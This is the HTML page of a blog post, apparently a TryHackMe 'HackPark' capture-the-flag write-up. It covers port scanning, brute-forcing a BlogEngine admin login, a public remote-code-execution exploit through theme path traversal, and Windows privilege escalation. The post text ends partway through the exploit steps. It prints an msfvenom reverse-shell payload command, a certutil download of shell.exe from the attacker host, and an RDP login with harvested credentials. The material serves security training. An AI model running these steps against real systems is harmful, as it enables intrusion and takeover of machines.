<!DOCTYPE html>
<html lang="en" dir="auto">

<head><meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="index, follow">
<title>HackPark - THM | Shebu 🔽</title>
<meta name="keywords" content="blogengine, autologon-credentials, rdp, systemscheduler, winpeas, tryhackme">
<meta name="description" content="Description - Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
Room name HackPark OS Windows Difficulty Medium Room Link https://tryhackme.com/room/hackpark Creator Tryhackme Enumeration - nmap ┌──(shebu㉿kali)-[~/thm/hackpark] └─$rustscan -a 10.10.253.78 --range 0-65535 -- -sV -sV -oN hackpark.nmap # Nmap 7.91 scan initiated Fri Sep 24 10:37:00 2021 as: nmap -vvv -p 80,3389 -sV -sC -v -oN hackpark.nmap 10.10.30.95 Nmap scan report for 10.">
<meta name="author" content="Shebu">
<link rel="canonical" href="https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/">
<link crossorigin="anonymous" href="/themes/hugo-PaperMod/assets/css/stylesheet.3613efbd0b1772781e8f49935e973cae632a7f61471c05b17be155505ccf87b5.css" integrity="sha256-NhPvvQsXcngej0mTXpc8rmMqf2FHHAWxe&#43;FVUFzPh7U=" rel="preload stylesheet" as="style">
<script defer crossorigin="anonymous" src="/themes/hugo-PaperMod/assets/js/highlight.f413e19d0714851f6474e7ee9632408e58ac146fbdbe62747134bea2fa3415e0.js" integrity="sha256-9BPhnQcUhR9kdOfuljJAjlisFG&#43;9vmJ0cTS&#43;ovo0FeA="
    onload="hljs.initHighlightingOnLoad();"></script>
<link rel="icon" href="https://sh3bu.github.io/themes/hugo-PaperMod/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://sh3bu.github.io/themes/hugo-PaperMod/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://sh3bu.github.io/themes/hugo-PaperMod/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://sh3bu.github.io/themes/hugo-PaperMod/apple-touch-icon.png">
<link rel="mask-icon" href="https://sh3bu.github.io/themes/hugo-PaperMod/safari-pinned-tab.svg">
<meta name="theme-color" content="#2e2e33">
<meta name="msapplication-TileColor" content="#2e2e33">
<noscript>
    <style>
        #theme-toggle,
        .top-link {
            display: none;
        }

    </style>
    <style>
        @media (prefers-color-scheme: dark) {
            :root {
                --theme: rgb(29, 30, 32);
                --entry: rgb(46, 46, 51);
                --primary: rgb(218, 218, 219);
                --secondary: rgb(155, 156, 157);
                --tertiary: rgb(65, 66, 68);
                --content: rgb(196, 196, 197);
                --hljs-bg: rgb(46, 46, 51);
                --code-bg: rgb(55, 56, 62);
                --border: rgb(51, 51, 51);
            }

            .list {
                background: var(--theme);
            }

            .list:not(.dark)::-webkit-scrollbar-track {
                background: 0 0;
            }

            .list:not(.dark)::-webkit-scrollbar-thumb {
                border-color: var(--theme);
            }
        }

    </style>
</noscript><meta property="og:title" content="HackPark - THM" />
<meta property="og:description" content="Description - Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
Room name HackPark OS Windows Difficulty Medium Room Link https://tryhackme.com/room/hackpark Creator Tryhackme Enumeration - nmap ┌──(shebu㉿kali)-[~/thm/hackpark] └─$rustscan -a 10.10.253.78 --range 0-65535 -- -sV -sV -oN hackpark.nmap # Nmap 7.91 scan initiated Fri Sep 24 10:37:00 2021 as: nmap -vvv -p 80,3389 -sV -sC -v -oN hackpark.nmap 10.10.30.95 Nmap scan report for 10." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/" />
<meta property="og:image" content="https://sh3bu.github.io/themes/hugo-PaperMod/img/hackpark.jpg" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-11-16T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-11-16T00:00:00+00:00" />

<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="https://sh3bu.github.io/themes/hugo-PaperMod/img/hackpark.jpg" />
<meta name="twitter:title" content="HackPark - THM"/>
<meta name="twitter:description" content="Description - Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
Room name HackPark OS Windows Difficulty Medium Room Link https://tryhackme.com/room/hackpark Creator Tryhackme Enumeration - nmap ┌──(shebu㉿kali)-[~/thm/hackpark] └─$rustscan -a 10.10.253.78 --range 0-65535 -- -sV -sV -oN hackpark.nmap # Nmap 7.91 scan initiated Fri Sep 24 10:37:00 2021 as: nmap -vvv -p 80,3389 -sV -sC -v -oN hackpark.nmap 10.10.30.95 Nmap scan report for 10."/>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [, 
    {
      "@type": "ListItem",
      "position":  2 ,
      "name": "Posts",
      "item": "https://sh3bu.github.io/themes/hugo-PaperMod/posts/"
    }, 
    {
      "@type": "ListItem",
      "position":  3 ,
      "name": "HackPark - THM",
      "item": "https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/"
    }
  ]
}
</script>
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "HackPark - THM",
  "name": "HackPark - THM",
  "description": "Description - Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!\nRoom name HackPark OS Windows Difficulty Medium Room Link https://tryhackme.com/room/hackpark Creator Tryhackme Enumeration - nmap ┌──(shebu㉿kali)-[~/thm/hackpark] └─$rustscan -a 10.10.253.78 --range 0-65535 -- -sV -sV -oN hackpark.nmap # Nmap 7.91 scan initiated Fri Sep 24 10:37:00 2021 as: nmap -vvv -p 80,3389 -sV -sC -v -oN hackpark.nmap 10.10.30.95 Nmap scan report for 10.",
  "keywords": [
    "blogengine", "autologon-credentials", "rdp", "systemscheduler", "winpeas", "tryhackme"
  ],
  "articleBody": "Description - Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!\nRoom name HackPark OS Windows Difficulty Medium Room Link https://tryhackme.com/room/hackpark Creator Tryhackme Enumeration - nmap ┌──(shebu㉿kali)-[~/thm/hackpark] └─$rustscan -a 10.10.253.78 --range 0-65535 -- -sV -sV -oN hackpark.nmap # Nmap 7.91 scan initiated Fri Sep 24 10:37:00 2021 as: nmap -vvv -p 80,3389 -sV -sC -v -oN hackpark.nmap 10.10.30.95 Nmap scan report for 10.10.30.95 Host is up, received syn-ack (0.70s latency). Scanned at 2021-09-24 10:37:01 EDT for 28s PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 8.5 | http-methods: | Supported Methods: GET HEAD OPTIONS TRACE POST |_ Potentially risky methods: TRACE | http-robots.txt: 6 disallowed entries | /Account/*.* /search /search.aspx /error404.aspx |_/archive /archive.aspx |_http-server-header: Microsoft-IIS/8.5 |_http-title: hackpark | hackpark amusements 3389/tcp open ssl/ms-wbt-server? syn-ack | ssl-cert: Subject: commonName=hackpark | Issuer: commonName=hackpark | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2021-09-23T14:29:32 | Not valid after: 2022-03-25T14:29:32 | MD5: d2d4 425f 7c21 ad81 a68a dc87 3dac 86a6 | SHA-1: e48f 524a 5059 28a3 1ac9 5b85 a200 b6b4 7c4d 3ba7 | -----BEGIN CERTIFICATE----- | MIIC1DCCAbygAwIBAgIQHkBfS+k/moVJ3+968HFmATANBgkqhkiG9w0BAQUFADAT | MREwDwYDVQQDEwhoYWNrcGFyazAeFw0yMTA5MjMxNDI5MzJaFw0yMjAzMjUxNDI5 | MzJaMBMxETAPBgNVBAMTCGhhY2twYXJrMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A | MIIBCgKCAQEAwuNKsVemOogwCY99oGULczMgMJIxd0iNtJKaqBFItWdTkeWsWKEy | qeBFbXV9Y7s4O+CrYyQyyE+CxmKmR+A2/TAPgVTMwfjKsxjP0u3lVt0rJzJSp0Hf | w5wMkesAjte6dCHOtY3kcXTzuMFbGNAmmAO8LXhQppVBoxchMdP3zcMQbw6kqkxA | ID7HHCkIQtlsHEcgkgDZVYdL4/rn+ohTxFPcEOWeNDXMMTkjCz4BYL1rRa761Nr1 | Ydtg91V9rfCxLNNq5HwcHX8lLMnnNh6Y+BHftIjVFYeaLG7hqY4nHLd537Fk6boN | 80lg08VY4AkxVVbWhDZ8qDyL3X8lMqdblwIDAQABoyQwIjATBgNVHSUEDDAKBggr | BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAISdX39FnLL9 | RyosCQvLDaj6w82nlKtCjEyEWqLMziueX/TzueeEJ00KbabgtHepW44WsE9ZyZJq | jvGqkjYsfXdAckVZFPOHwyM3FpxF6lhGaYVVdMiZrBdMfvOMTNHXpyK9uG8g5Dun | BPk+1z/25lO9DEOdFRHFHagbC2mf9shwWt9dDIUfVNBg5sFYFNNUo+WNJxsDVEP6 | 8C3Oi1E6Bpj7LGUrodc0kdIbVdgh+VXJW1OJEiLK/G208feHIyYvG7Mh9Jgk6g6q | /hWv/T3d/fjelncL12dKIU/NodsLQ4uqknZolHfCXbIE7ME5i0HEVTJ3cL3Fh8PX | 1g871ab1pXY= |_-----END CERTIFICATE----- |_ssl-date: 2021-09-24T14:36:21+00:00; -1m06s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -1m06s Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Sep 24 10:37:29 2021 -- 1 IP address (1 host up) scanned in 28.75 seconds There are 2 ports open :\nPort 80 - http - Microsoft IIS httpd 8.5\nPort 3389 - RDP - Microsoft WBT Server\nWeb enumeration Visiting the website at port 80 gives us this page\nAs per our map scan there are few disallowed entries in robots.txt,let’s check it out\nAll of them returned 403 but /archive gave us this page but it didn’t contain any interesting stuff\nThe options tab in the home page we visited earlier had a login option,\nLet’s check it out\nHydra I tried all default usernames and passwords but nothing worked,so I decided to bruteforce the login form using hydra\nAnd it worked, now we have a username and password .Let’s log in !\nFoothold - The About section tells us the version of the BlogEngine being used here is 3.3.6.0\nLooking for exploits for this particular version in searchsploit reveals this,\nThere are 3 RCE exploits , lets try the first one. Before that we’ll mirror the exploit and examine it - searchsploit -m aspx/webapps/46353.cs The exploit tells us the steps we need to do inorder to gain a reverse shell back to our machine.\nHere’s what we need to do\n1.Rename the exploit as \"PostView.ascx\" 2.Change the IP and port in the exploit . 3.Log in to the application as admin. 4.Click Contents-\u003ePosts-\u003eWelcome to Hackpark title-\u003eFile Manager 5.Click on UPLOAD Upload the PostView.ascx and save it 6.Setup nc listener and visit http:///?theme=../../App_Data/files 7.The web page keeps on loading which means you've got a rev-shell back ! The shell is not stable so let’s create a msfvenom payload and upload it to the machine 👇🏻\n1.On our machine -\u003e msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.30.219 LPORT=4444 -f exe \u003e shell.exe\n2.On victim machine, go to C:\\Users\\Public which is usually world writable directory and grab the msfvenom payload from our machine\n-\u003e certutil.exe -urlcache -f http://10.11.30.219:8000/shell.exe shell.exe\n3.Execute shell.exe to get back a stable shell in msf .\nPrivilege Escalation - Running sysinfo tells us that we are on a 64-bit machine.\nThere are 2 users on the system - jeff and administrator\nI quickly transferred winpeas to the target machine and ran it\nThere were 2 way to priv-esc as admin user\nMethod 1 - Running winpeas tells us that we have permissions to modify the following system-scheduler service binary\nC:\\Program Files (x86)\\SystemScheduler - contains all the executables run by the scheduler.But we need to know which .exe is being executed by the systemscheduler.\nNOTE - Scheduler is similar to something like cron in Linux\nSo lets check the Events directory inside the SystemScheduler folder which contains the systemlog files. The 20198415519.INI_LOG.txt file contains the info we need! From the contents of the log file we could understand that the Message.exe is being run by administrator every 30 seconds.\nTo exploit this just follow the steps ,\n1.Rename Message.exe to Message.bak\n2.Move shell.exe which we previously used to gain a stable shell to this current directory C:\\Program Files (x86)\\SystemScheduler\n3.Rename shell.exe to Message.exe.\n4.Setup a netcat listener on our local machine and wait for 30 seconds to get a shell back as administrator !\nMethod 2 - Winpeas output gave us these credentials 👇🏻\nRemember ? We had port 3389 open which is RDP.\nLet’s try logging in using xfreerdp\nxfreerdp /u:administrator /v:10.10.176.92:3389 /cert:ignore /p:4q6XvFES7Fdxs Aaandd we’re in !\nGrab the user.txt 🚩\nOpen command prompt, navigate C:\\Users\\jeff\\Desktop and grab the user flag Grab root.txt 🚩\nroot.txt file is on the Desktop of admin user . ",
  "wordCount" : "863",
  "inLanguage": "en",
  "image":"https://sh3bu.github.io/themes/hugo-PaperMod/img/hackpark.jpg","datePublished": "2021-11-16T00:00:00Z",
  "dateModified": "2021-11-16T00:00:00Z",
  "author":{
    "@type": "Person",
    "name": "Shebu"
  },
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/"
  },
  "publisher": {
    "@type": "Organization",
    "name": "Shebu 🔽",
    "logo": {
      "@type": "ImageObject",
      "url": "https://sh3bu.github.io/themes/hugo-PaperMod/favicon.ico"
    }
  }
}
</script>
</head>

<body class="" id="top">
<script>
    if (localStorage.getItem("pref-theme") === "dark") {
        document.body.classList.add('dark');
    } else if (localStorage.getItem("pref-theme") === "light") {
        document.body.classList.remove('dark')
    } else if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
        document.body.classList.add('dark');
    }

</script>

<header class="header">
    <nav class="nav">
        <div class="logo">
            <a href="https://sh3bu.github.io/themes/hugo-PaperMod" accesskey="h" title="Shebu 🔽 (Alt + H)">Shebu 🔽</a>
            <div class="logo-switches">
                <button id="theme-toggle" accesskey="t" title="(Alt + T)">
                    <svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>
                    </svg>
                    <svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <circle cx="12" cy="12" r="5"></circle>
                        <line x1="12" y1="1" x2="12" y2="3"></line>
                        <line x1="12" y1="21" x2="12" y2="23"></line>
                        <line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line>
                        <line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line>
                        <line x1="1" y1="12" x2="3" y2="12"></line>
                        <line x1="21" y1="12" x2="23" y2="12"></line>
                        <line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line>
                        <line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>
                    </svg>
                </button>
            </div>
        </div>
        <ul id="menu">
            <li>
                <a href="https://sh3bu.github.io/themes/hugo-PaperMod/archives" title="Archive">
                    <span>Archive</span>
                </a>
            </li>
            <li>
                <a href="https://sh3bu.github.io/themes/hugo-PaperMod/search/" title="Search (Alt &#43; /)" accesskey=/>
                    <span>Search</span>
                </a>
            </li>
            <li>
                <a href="https://sh3bu.github.io/themes/hugo-PaperMod/tags/" title="Tags">
                    <span>Tags</span>
                </a>
            </li>
        </ul>
    </nav>
</header>
<main class="main">

<article class="post-single">
  <header class="post-header">
    <div class="breadcrumbs"><a href="https://sh3bu.github.io/themes/hugo-PaperMod">Home</a>&nbsp;»&nbsp;<a href="https://sh3bu.github.io/themes/hugo-PaperMod/posts/">Posts</a></div>
    <h1 class="post-title">
      HackPark - THM
    </h1>
    <div class="post-meta"><span title='2021-11-16 00:00:00 +0000 UTC'>November 16, 2021</span>&nbsp;·&nbsp;5 min&nbsp;·&nbsp;Shebu

</div>
  </header> 
<figure class="entry-cover">
        <img loading="lazy" srcset="https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark_hu3d03a01dcc18bc5be0e67db3d8d209a6_47578_360x0_resize_q75_box.jpg 360w ,https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark_hu3d03a01dcc18bc5be0e67db3d8d209a6_47578_480x0_resize_q75_box.jpg 480w ,https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark_hu3d03a01dcc18bc5be0e67db3d8d209a6_47578_720x0_resize_q75_box.jpg 720w ,https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark_hu3d03a01dcc18bc5be0e67db3d8d209a6_47578_1080x0_resize_q75_box.jpg 1080w ,https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark_hu3d03a01dcc18bc5be0e67db3d8d209a6_47578_1500x0_resize_q75_box.jpg 1500w ,https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark.jpg 1600w" 
            sizes="(min-width: 768px) 720px, 100vw" src="https://sh3bu.github.io/themes/hugo-PaperMod/posts/hackpark/img/hackpark.jpg" alt="" 
            width="1600" height="840">
        <p><text></p>
</figure><div class="toc">
    <details >
        <summary accesskey="c" title="(Alt + C)">
            <span class="details">Table of Contents</span>
        </summary>

        <div class="inner"><ul>
                <li>
                    <a href="#description--" aria-label="Description -">Description -</a></li>
                <li>
                    <a href="#enumeration--" aria-label="Enumeration -">Enumeration -</a><ul>
                        <ul>
                        
                <li>
                    <a href="#nmap" aria-label="nmap">nmap</a></li>
                <li>
                    <a href="#web-enumeration" aria-label="Web enumeration">Web enumeration</a></li>
                <li>
                    <a href="#hydra" aria-label="Hydra">Hydra</a></li></ul>
                    </ul>
                </li>
                <li>
                    <a href="#foothold--" aria-label="Foothold -">Foothold -</a></li>
                <li>
                    <a href="#privilege-escalation--" aria-label="Privilege Escalation -">Privilege Escalation -</a><ul>
                        <ul>
                        
                <li>
                    <a href="#method-1--" aria-label="Method 1 -">Method 1 -</a></li>
                <li>
                    <a href="#method-2--" aria-label="Method 2 -">Method 2 -</a>
                </li>
            </ul>
            </ul>
            </li>
            </ul>
        </div>
    </details>
</div>

  <div class="post-content"><h2 id="description--">Description -<a hidden class="anchor" aria-hidden="true" href="#description--">#</a></h2>
<hr>
<p>Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632569217285/Le7ky7hva.jpeg" alt="91808b57148243.59ca95624c102.jpg"  />
</p>
<table>
<thead>
<tr>
<th style="text-align:center"><strong>Room name</strong></th>
<th>HackPark</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center"><strong>OS</strong></td>
<td>Windows</td>
</tr>
<tr>
<td style="text-align:center"><strong>Difficulty</strong></td>
<td>Medium</td>
</tr>
<tr>
<td style="text-align:center"><strong>Room Link</strong></td>
<td><a href="https://tryhackme.com/room/hackpark">https://tryhackme.com/room/hackpark</a></td>
</tr>
<tr>
<td style="text-align:center"><strong>Creator</strong></td>
<td><a href="https://tryhackme.com/p/tryhackme">Tryhackme</a></td>
</tr>
</tbody>
</table>
<h2 id="enumeration--">Enumeration -<a hidden class="anchor" aria-hidden="true" href="#enumeration--">#</a></h2>
<hr>
<h4 id="nmap">nmap<a hidden class="anchor" aria-hidden="true" href="#nmap">#</a></h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-zsh" data-lang="zsh"><span class="line"><span class="cl">┌──<span class="o">(</span>shebu㉿kali<span class="o">)</span>-<span class="o">[</span>~/thm/hackpark<span class="o">]</span>
</span></span><span class="line"><span class="cl">└─<span class="nv">$rustscan</span> -a 10.10.253.78 --range 0-65535 -- -sV -sV -oN hackpark.nmap
</span></span><span class="line"><span class="cl"><span class="c1"># Nmap 7.91 scan initiated Fri Sep 24 10:37:00 2021 as: nmap -vvv -p 80,3389 -sV -sC -v -oN hackpark.nmap 10.10.30.95</span>
</span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.30.95
</span></span><span class="line"><span class="cl">Host is up, received syn-ack <span class="o">(</span>0.70s latency<span class="o">)</span>.
</span></span><span class="line"><span class="cl">Scanned at 2021-09-24 10:37:01 EDT <span class="k">for</span> 28s
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">PORT     STATE SERVICE            REASON  VERSION
</span></span><span class="line"><span class="cl">80/tcp   open  http               syn-ack Microsoft IIS httpd 8.5
</span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: 
</span></span><span class="line"><span class="cl"><span class="p">|</span>   Supported Methods: GET HEAD OPTIONS TRACE POST
</span></span><span class="line"><span class="cl"><span class="p">|</span>_  Potentially risky methods: TRACE
</span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">6</span> disallowed entries 
</span></span><span class="line"><span class="cl"><span class="p">|</span> /Account/*.* /search /search.aspx /error404.aspx 
</span></span><span class="line"><span class="cl"><span class="p">|</span>_/archive /archive.aspx
</span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/8.5
</span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: hackpark <span class="p">|</span> hackpark amusements
</span></span><span class="line"><span class="cl">3389/tcp open  ssl/ms-wbt-server? syn-ack
</span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>hackpark
</span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>hackpark
</span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa
</span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span>
</span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha1WithRSAEncryption
</span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-09-23T14:29:32
</span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after:  2022-03-25T14:29:32
</span></span><span class="line"><span class="cl"><span class="p">|</span> MD5:   d2d4 425f 7c21 ad81 a68a dc87 3dac 86a6
</span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: e48f 524a <span class="m">5059</span> 28a3 1ac9 5b85 a200 b6b4 7c4d 3ba7
</span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE-----
</span></span><span class="line"><span class="cl"><span class="p">|</span> MIIC1DCCAbygAwIBAgIQHkBfS+k/moVJ3+968HFmATANBgkqhkiG9w0BAQUFADAT
</span></span><span class="line"><span class="cl"><span class="p">|</span> MREwDwYDVQQDEwhoYWNrcGFyazAeFw0yMTA5MjMxNDI5MzJaFw0yMjAzMjUxNDI5
</span></span><span class="line"><span class="cl"><span class="p">|</span> MzJaMBMxETAPBgNVBAMTCGhhY2twYXJrMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
</span></span><span class="line"><span class="cl"><span class="p">|</span> MIIBCgKCAQEAwuNKsVemOogwCY99oGULczMgMJIxd0iNtJKaqBFItWdTkeWsWKEy
</span></span><span class="line"><span class="cl"><span class="p">|</span> qeBFbXV9Y7s4O+CrYyQyyE+CxmKmR+A2/TAPgVTMwfjKsxjP0u3lVt0rJzJSp0Hf
</span></span><span class="line"><span class="cl"><span class="p">|</span> w5wMkesAjte6dCHOtY3kcXTzuMFbGNAmmAO8LXhQppVBoxchMdP3zcMQbw6kqkxA
</span></span><span class="line"><span class="cl"><span class="p">|</span> ID7HHCkIQtlsHEcgkgDZVYdL4/rn+ohTxFPcEOWeNDXMMTkjCz4BYL1rRa761Nr1
</span></span><span class="line"><span class="cl"><span class="p">|</span> Ydtg91V9rfCxLNNq5HwcHX8lLMnnNh6Y+BHftIjVFYeaLG7hqY4nHLd537Fk6boN
</span></span><span class="line"><span class="cl"><span class="p">|</span> 80lg08VY4AkxVVbWhDZ8qDyL3X8lMqdblwIDAQABoyQwIjATBgNVHSUEDDAKBggr
</span></span><span class="line"><span class="cl"><span class="p">|</span> BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAISdX39FnLL9
</span></span><span class="line"><span class="cl"><span class="p">|</span> RyosCQvLDaj6w82nlKtCjEyEWqLMziueX/TzueeEJ00KbabgtHepW44WsE9ZyZJq
</span></span><span class="line"><span class="cl"><span class="p">|</span> jvGqkjYsfXdAckVZFPOHwyM3FpxF6lhGaYVVdMiZrBdMfvOMTNHXpyK9uG8g5Dun
</span></span><span class="line"><span class="cl"><span class="p">|</span> BPk+1z/25lO9DEOdFRHFHagbC2mf9shwWt9dDIUfVNBg5sFYFNNUo+WNJxsDVEP6
</span></span><span class="line"><span class="cl"><span class="p">|</span> 8C3Oi1E6Bpj7LGUrodc0kdIbVdgh+VXJW1OJEiLK/G208feHIyYvG7Mh9Jgk6g6q
</span></span><span class="line"><span class="cl"><span class="p">|</span> /hWv/T3d/fjelncL12dKIU/NodsLQ4uqknZolHfCXbIE7ME5i0HEVTJ3cL3Fh8PX
</span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">1g871ab1pXY</span><span class="o">=</span>
</span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE-----
</span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2021-09-24T14:36:21+00:00<span class="p">;</span> -1m06s from scanner time.
</span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Host script results:
</span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: -1m06s
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Read data files from: /usr/bin/../share/nmap
</span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Fri Sep 24 10:37:29 2021 -- 1 IP address (1 host up) scanned in 28.75 seconds</span>
</span></span></code></pre></div><p>There are 2 ports open :</p>
<p><strong>Port 80</strong> - <code>http </code> - <code>Microsoft IIS httpd 8.5</code></p>
<p><strong>Port 3389</strong> - <code>RDP</code> -  <code>Microsoft WBT Server</code></p>
<h4 id="web-enumeration">Web enumeration<a hidden class="anchor" aria-hidden="true" href="#web-enumeration">#</a></h4>
<hr>
<p>Visiting the website at port 80 gives us this page</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632576856724/73cbUHHWa.png" alt="image.png"  />
</p>
<p>As per our map scan there are few disallowed entries in robots.txt,let&rsquo;s check it out</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632576996167/oWGD336ug.png" alt="image.png"  />
</p>
<p>All of them returned 403 but <code>/archive</code> gave us this page but it didn&rsquo;t contain any interesting stuff</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632577092768/oTJoyxzaA.png" alt="image.png"  />
</p>
<p>The options tab in the home page we visited earlier had a login option,</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632577162449/_oEkcO8Ai.png" alt="image.png"  />

Let&rsquo;s check it out</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632577240563/DHfSghYs2.png" alt="image.png"  />
</p>
<h4 id="hydra">Hydra<a hidden class="anchor" aria-hidden="true" href="#hydra">#</a></h4>
<hr>
<p>I tried all default usernames and passwords but nothing worked,so I decided to bruteforce the login form using <strong>hydra</strong></p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632577327616/rnhg3xQxl.png" alt="image.png"  />
</p>
<p>And it worked, now we have a username and password .Let&rsquo;s log in !</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632577649505/ymyOTawPM.png" alt="image.png"  />
</p>
<h2 id="foothold--">Foothold -<a hidden class="anchor" aria-hidden="true" href="#foothold--">#</a></h2>
<hr>
<p>The <strong>About</strong> section tells us the version of the <code>BlogEngine</code> being used here is <code>3.3.6.0</code></p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632589633280/l69fE2UQt.png" alt="image.png"  />
</p>
<p>Looking for exploits for this particular version in searchsploit reveals this,</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632577792556/o0Od4tB2-.png" alt="image.png"  />
</p>
<p>There are 3 RCE exploits , lets try the first one. Before that we&rsquo;ll mirror the exploit and examine it - <code>searchsploit -m aspx/webapps/46353.cs </code></p>
<p>The exploit tells us the steps we need to do inorder to gain a reverse shell back to our machine.</p>
<p><img loading="lazy" src="https://cdn.hashnode.com/res/hashnode/image/upload/v1632578000079/iZPy6iGO5.png" alt="image.png"  />
</p>
<p>Here&rsquo;s what we need to do</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-zsh" data-lang="zsh"><span class="line"><span class="cl">1.Rename the exploit as <span class="s2">&#34;PostView.ascx&#34;</span>
</span></span><span class="line"><span class="cl">2.Change the IP and port in the exploit .
</span></span><span class="line"><span class="cl">3.Log in to the application as admin.
</span></span><span class="line"><span class="cl">4.Click Contents-&gt;Posts-&gt;Welcome to Hackpark title-&gt;File Manager
</span></span><span class="line"><span class="cl">5.Click on UPLOAD
</span></span><span class="line"><span class="cl">Upload the PostView.ascx and save it
</span></span><span class="line"><span class="cl">6.Setup nc listener and visit http://&lt;ip&gt;/?theme<span class="o">=</span>../../App_Data/files
</span></span><span class="line"><span class="cl">7.The web page keeps on loading which means you<span class="err">&#39;</span>ve got a rev-shell back !
